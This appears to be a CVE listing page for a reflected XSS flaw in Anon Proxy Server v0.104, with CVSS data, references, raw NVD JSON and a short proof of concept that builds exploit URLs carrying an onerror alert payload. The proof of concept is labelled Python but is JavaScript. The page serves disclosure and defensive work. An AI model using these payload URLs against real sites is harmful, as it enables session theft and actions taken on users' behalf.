CVE-2025-41355

Description

Reflected Cross-Site Scripting (XSS) vulnerability in Anon Proxy Server v0.104. This vulnerability allows an attacker to execute JavaScript code in the victim's browser by sending him/her a malicious URL. This vulnerability can be exploited to steal sensitive user data, such as session cookies, or to perform actions on behalf of the user. It affects 'port' and 'proxyPort' parameters in '/anon.php' endpoint.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:anonproxyserver:anon_proxy_server:0.104:*:*:*:*:*:*:* - VULNERABLE

Anon Proxy Server 0.104

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// Proof of Concept for CVE-2025-41355
// Target: Anon Proxy Server v0.104
// Description: Injecting script via 'port' parameter

// Malicious payload to demonstrate XSS
var payload = "<img src=x onerror=alert('CVE-2025-41355')>";

// Constructing the vulnerable endpoint URL
// The 'port' parameter is vulnerable to reflected XSS
var target = "http://example.com/anon.php?port=" + encodeURIComponent(payload);

// Alternatively, 'proxyPort' is also vulnerable
var targetProxy = "http://example.com/anon.php?proxyPort=" + encodeURIComponent(payload);

// In a real attack scenario, the attacker would send this URL to the victim.
// When the victim clicks, the alert box will appear, proving code execution.
console.log("Exploit URL: " + target);

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-41355
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-41355
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-41355/
[4] VulDB https://vuldb.com/cve/CVE-2025-41355
[5] https://www.incibe.es/en/incibe-cert/notices/aviso/reflected-cross-site-scripting-xss-anon-proxy-server

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-41355", "sourceIdentifier": "[email protected]", "published": "2026-03-31T09:16:22.137", "lastModified": "2026-04-07T15:32:32.443", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Reflected Cross-Site Scripting (XSS) vulnerability in Anon Proxy Server \nv0.104. This vulnerability allows an attacker to execute JavaScript code\n in the victim's browser by sending him/her a malicious URL. This \nvulnerability can be exploited to steal sensitive user data, such as \nsession cookies, or to perform actions on behalf of the user. It affects \n'port' and 'proxyPort' parameters in '/anon.php' endpoint."}, {"lang": "es", "value": "Vulnerabilidad de cross-site scripting (XSS) reflejado en Anon Proxy Server v0.104. Esta vulnerabilidad permite a un atacante ejecutar código JavaScript en el navegador de la víctima enviándole una URL maliciosa. Esta vulnerabilidad puede ser explotada para robar datos sensibles del usuario, como cookies de sesión, o para realizar acciones en nombre del usuario. Afecta a los parámetros 'port' y 'proxyPort' en el endpoint '/anon.php'."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:anonproxyserver:anon_proxy_server:0.104:*:*:*:*:*:*:*", "matchCriteriaId": "58ED9571-EA95-4002-A5A2-10EBC703F39D"}]}]}], "references": [{"url": "https://www.incibe.es/en/incibe-cert/notices/aviso/reflected-cross-site-scripting-xss-anon-proxy-server", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}